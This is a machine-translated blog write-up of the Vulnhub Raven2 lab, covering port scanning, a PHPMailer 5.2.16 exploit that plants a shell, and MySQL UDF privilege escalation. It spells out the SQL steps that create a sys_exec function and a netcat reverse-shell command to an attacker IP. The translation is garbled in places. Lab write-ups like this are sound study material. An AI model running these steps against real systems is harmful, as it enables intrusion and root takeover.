当前位置:网站首页>Raven2 of vulnhub
Raven2 of vulnhub
2022-07-03 11:47:00 【Plum_ Flowers_ seven】
Only take personal study notes
Catalog
3、 ... and 、 Service version detection
1. Always requesting resources
7、 ... and 、mysql And udf Raise the right
One 、 The host found

Two 、 Port scanning

3、 ... and 、 Service version detection
routine 22,80 port .
111 This is an incomprehensible
42689 Open the remote process call protocol

Four 、 information gathering
1. Always requesting resources
It is the same as the original request for some foreign site resources , As a result, it cannot be loaded normally , Just hang a ladder . If you use burp, Just hang it on two floors .
It's a security company interface

2. Regular source code
Look at the interface , Source code leakage , Is there a hidden directory , None .
5、 ... and 、 Scan directory
The most basic information is wordpress Station building

1. /vendor
3,4,5 All the documents mentioned PHPMailer,readme It's a readme , It introduces phpmailer It's a php Mail transmission class ,. and security He mentioned his historical loopholes .changelog Tell the change log .
Try from phpmailer Make a breakthrough

(1)flag1

6、 ... and 、phpmailer
Because we can know from the above file that the version is 5.2.16, So try these .
1.40974.py
40974.py It can be used . Write bounce to target path shell file .

Be careful : You need to change the contents of the file before using
(1) Change back to the connection address
(2) Write the backdoor file path
(3) The goal is ip
You can also change the file name

2. Access trigger
3. rebound shell
7、 ... and 、mysql And udf Raise the right
When we collect information , It is found that there is leakage mysql Account and password ,
When checking the process , And found out mysql In order to root It belongs to the main operation , So we can use mysql Right to come ,
1. information gathering
root [email protected]

2.udf Raise the right
udf The original intention of the design is to facilitate users to customize some functions , It is convenient to query some complex data , At the same time, the use of udf The possibility of raising rights .
An attacker calls... By writing cmd perhaps shell Of udf.dll file , And import it into a specified folder Directory , Create a point to udf.dll The custom function of , Thus, the query in the database is equivalent to cmd perhaps shell Middle execution command .
3. step
(1) find kali Self contained udf Lift the right link library file .so

(2)64.so To the target plane
It's better to put /tmp Next
(3) Check the plug-in path
show variables like '%plugin%';
(4) Write to the database through the link library file
Using the system database , Create a table , Write link library file data .
use mysql;
create table a(line blob);
insert into a values(load_file('/tmp/x.so'));
(5) Then write the link library file to the plug-in location
select * from a into dumpfile '/usr/lib/mysql/plugin/x.so';
(6) Create a new function
create function sys_exec returns integer soname 'x.so';
(7) Execute bounce shell
select sys_exec('nc 192.168.0.107 6666 -e /bin/bash');

边栏推荐
- R语言ggplot2可视化:gganimate包创建动态折线图动画(gif)、使用transition_reveal函数在动画中沿给定维度逐步显示数据、在折线移动方向添加数据点
- Spl06-007 air pressure sensor (example of barometer)
- Hongmeng third training (project training)
- (数据库提权——Redis)Redis未授权访问漏洞总结
- STL教程10-容器共性和使用场景
- 2022 东北四省赛 VP记录/补题
- Gut | Yu Jun group of the Chinese University of Hong Kong revealed that smoking changes intestinal flora and promotes colorectal cancer (do not smoke)
- 在CoreOS下部署WordPress实例教程
- R语言使用gridExtra包的grid.arrange函数将ggplot2包的多个可视化图像横向组合起来,ncol参数自定义组合图列数、nrow参数自定义组合图行数
- 836. 合并集合(DAY 63)并查集
猜你喜欢

AOSP ~ NTP ( 网络时间协议 )

Arctangent entropy: the latest SCI paper in July 2022

ASP.NET-酒店管理系统

Hongmeng third training (project training)

软件测试周刊(第78期):你对未来越有信心,你对现在越有耐心。

基于turtlebot3实现SLAM建图及自主导航仿真

Numpy np.max和np.maximum实现relu函数

Hongmeng fourth training

(database authorization - redis) summary of unauthorized access vulnerabilities in redis

How should intermediate software designers prepare for the soft test
随机推荐
ASP.NET-酒店管理系统
利用Zabbix动态监控磁盘I/O
POI excel cell wrap
How to get started embedded future development direction of embedded
Solicitation for JGG special issue: spatio-temporal omics
previous permutation lintcode51
抓包整理外篇fiddler———— 会话栏与过滤器[二]
How to clean up v$rman_ backup_ job_ Details view reports error ora-02030
鸿蒙第三次培训(项目实训)
Hongmeng fourth training
CSRF
Mmc5603nj geomagnetic sensor (Compass example)
Spl06-007 air pressure sensor (example of barometer)
.\vmware-vdiskmanager.exe -k “c:\\xxxxx.vmdk”
Event preview | the live broadcast industry "rolled in" to drive new data growth points with product power
量化计算调研
导师对帮助研究生顺利完成学业提出了20条劝告:第一,不要有度假休息的打算.....
STL教程10-容器共性和使用场景
How to mix embedded MCU, arm and DSP?
FL Studio 20 unlimited trial fruit arranger Download